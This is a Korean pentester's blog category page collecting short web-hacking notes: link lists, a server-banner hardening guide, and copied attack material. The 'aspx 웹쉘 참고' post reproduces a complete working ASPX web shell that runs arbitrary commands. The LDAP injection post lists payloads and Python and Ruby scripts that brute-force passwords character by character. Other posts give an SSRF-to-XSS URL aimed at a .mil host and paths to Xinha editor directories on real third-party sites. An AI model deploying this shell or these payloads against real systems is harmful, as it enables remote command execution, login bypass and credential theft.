'웹'에 해당되는 글 67건

CSRF 참고 hacktricks

2022. 4. 23. 14:15

https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

 

CSRF (Cross Site Request Forgery) - HackTricks

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

book.hacktricks.xyz

 

 

'' 카테고리의 다른 글

wordpress 대표적인 취약점 정리  (0) 2022.04.29
Wordpress 정리  (0) 2022.04.29
graphql insql  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
블로그 이미지

wtdsoul

,

graphql insql

2022. 4. 23. 13:18

https://github.com/doyensec/inql

 

GitHub - doyensec/inql: InQL - A Burp Extension for GraphQL Security Testing

InQL - A Burp Extension for GraphQL Security Testing - GitHub - doyensec/inql: InQL - A Burp Extension for GraphQL Security Testing

github.com

https://blog.assetnote.io/2021/08/29/exploiting-graphql/

 

Exploiting GraphQL

Application security issues found by Assetnote

blog.assetnote.io

 

https://www.jython.org/download

 

Downloads

The Python runtime on the JVM

www.jython.org

 

https://book.hacktricks.xyz/pentesting/pentesting-web/graphql

 

GraphQL - HackTricks

If you can search by a string type, like: query={theusers(description: ""){username,password}} and you search for an empty string it will dump all data. (Note this example isn't related with the example of the tutorials, for this example suppose you can se

book.hacktricks.xyz

 

 

'' 카테고리의 다른 글

Wordpress 정리  (0) 2022.04.29
CSRF 참고 hacktricks  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
블로그 이미지

wtdsoul

,

xinha 에디터 추가

2022. 4. 20. 15:36

http://neon.com.my/editor/xinha/examples/

 

Index of /editor/xinha/examples

 

neon.com.my

http://neon.com.my/editor/xinha/plugins/GetHtml/

 

Index of /editor/xinha/plugins/GetHtml

 

neon.com.my

https://als.uam.edu.pa/xinha/plugins/ImageManager/

 

 

'' 카테고리의 다른 글

CSRF 참고 hacktricks  (0) 2022.04.23
graphql insql  (0) 2022.04.23
aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
블로그 이미지

wtdsoul

,

aspx 웹쉘 참고

2022. 4. 19. 14:44

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

 

GitHub - tennc/webshell: This is a webshell open source project

This is a webshell open source project. Contribute to tennc/webshell development by creating an account on GitHub.

github.com

 

   
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>
   
  <script runat="server">
   
  Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.UseShellExecute = false
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments=xcmd.text
  myProcess.Start()
   
  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.Readtoend()
  myProcess.Close()
  mystring=replace(mystring,"<","&lt;")
  mystring=replace(mystring,">","&gt;")
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  End Sub
   
  </script>
   
  <html>
  <body>
  <form runat="server">
  <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  <p><asp:Label id="result" runat="server"></asp:Label>
  </form>
  </body>
  </html>

'' 카테고리의 다른 글

graphql insql  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
블로그 이미지

wtdsoul

,

HTTP Request Smuggling

2022. 4. 9. 12:32

https://hackyboiz.github.io/2022/03/06/syru/funny-smuggling-story-pt2/

 

 

 

'' 카테고리의 다른 글

xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
블로그 이미지

wtdsoul

,

서버버전 정보 노출 대응방안

2022. 2. 25. 09:57

https://itinformation.tistory.com/63

 

서버버전 노출 대응방안 모음

@@ apache Coyote ■ server : Apache-Coyote/1.1가 노출되는 상황 ■ 대응방법 - server.xml의 http Connector 설정에 다음과 같이 server=" "를 추가하고 그 사이에 노출을 원하는 문자열을 삽입 - server=""로..

itinformation.tistory.com

 

@@ apache Coyote

 

■ server : Apache-Coyote/1.1가 노출되는 상황

 

 대응방법

- server.xml http Connector 설정에 다음과 같이 server=" "를 추가하고 그 사이에 노출을 원하는 문자열을 삽입

<Connector port="8080" protocol="HTTP/1.1" server="Server" ...>

- server=""로 할 경우 원래와 같이 Apache-Coyote/1.1 =가 표시되니 만일 blank 로 표시하고 싶다면 server=" "와 같이 공백을 포함하여 설정

 

 

  @@ 아파치

 

■ server : Apache Tomcat x.x 가 노출되는 상황

 

 대응방법

 

) apache 서버정보 노출 대응 방법
 
//httpd.conf 파일내 다음 내용 추가 및 수정
ServerTokens Prod
ServerSignature Off

- 설정에 다른 응답헤더 결과

ServerTokens Prod[uctOnly] => Server: Apache

ServerTokens Min[imal] => Server: Apache/2.0.41

ServerTokens OS : Server => Apache/2.0.41 (Unix)

ServerTokens Full : Server => Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2

 

 

 @@ x-powered-by(php)

 

■ server : X-Powered-by : PHP x.x 가 노출되는 상황

 

 대응방법

- 설정파일 standalone.xml 또는 domain.xml에 아래와 같이 설정

<configration>

<jsp-configration x-powered-by=“false”/>

</configration>

 

- php.ini  expose_php 옵션 수정

expose_php = Off

 

 

@@ 에러페이지

 

 에러페이지 리다이렉션 ()

)
//web.xml
<error-page>
<error-code>404</error-code>
<location>/WEB-INF/jsp/common/error/404error.jsp</location>
</error-page>
....
<error-page>
<error-code>500</error-code>
<location>/WEB-INF/jsp/common/error/500error.jsp</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/WEB-INF/jsp/common/error/error.jsp</location>
</error-page>

 

 

 

 

 



출처: https://itinformation.tistory.com/63 [정보보안 스토리]

'' 카테고리의 다른 글

aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
블로그 이미지

wtdsoul

,

SSTF Github

2022. 2. 23. 23:13

 

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

 

SSRF to XSS

by @D0rkerDevil & @alyssa.o.herrera

http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf

https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg

'' 카테고리의 다른 글

HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
websquare 이하 경로  (0) 2021.12.21
블로그 이미지

wtdsoul

,

LDAP 인젝션

2022. 1. 20. 15:20

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

 

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and ...

github.com

https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

LDAP injection

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.

Summary

Exploitation

Example 1.

user  = *)(uid=*))(|(uid=*
pass  = password
query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))

Example 2

user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

Payloads

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind Exploitation

We can extract using a bypass login

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

Defaults attributes

Can be used in an injection like *)(ATTRIBUTE_HERE=*

userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

Exploiting userPassword attribute

userPassword attribute is not a string like the cn attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).

octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.

userPassword:2.5.13.18:=\xx (\xx is a byte)
userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx

Scripts

Discover valid LDAP fields

#!/usr/bin/python3

import requests
import string

fields = []

url = 'https://URL.com/'

f = open('dic', 'r') #Open the wordlists of common attributes
wordl = f.read().split('\n')
f.close()

for i in wordl:
    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    if 'TRUE CONDITION' in r.text:
        fields.append(str(i))

print(fields)

Ref. [5][5]

Special blind LDAP injection (without "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break

Ref. [5][5]

#!/usr/bin/env ruby

require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')

flag = ''

(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end

By noraj

References

 

'' 카테고리의 다른 글

서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
ckeditor release-notes  (0) 2021.12.27
websquare 이하 경로  (0) 2021.12.21
proxy tool  (0) 2021.11.17
블로그 이미지

wtdsoul

,

ckeditor release-notes

2021. 12. 27. 12:33

https://ckeditor.com/cke4/release-notes

 

Release notes

Security Updates: Fixed XSS vulnerability in the Clipboard plugin reported by Anton Subbotin. Issue summary: The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. See

ckeditor.com

 

 

'' 카테고리의 다른 글

SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
websquare 이하 경로  (0) 2021.12.21
proxy tool  (0) 2021.11.17
apache tomcat tree  (0) 2021.11.08
블로그 이미지

wtdsoul

,

websquare 이하 경로

2021. 12. 21. 14:23

 

websquare/fiddle/fiddle.html

'' 카테고리의 다른 글

LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
proxy tool  (0) 2021.11.17
apache tomcat tree  (0) 2021.11.08
overflow error based 확인  (0) 2021.10.27
블로그 이미지

wtdsoul

,

공지사항

태그목록

글 보관함

달력

«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

티스토리툴바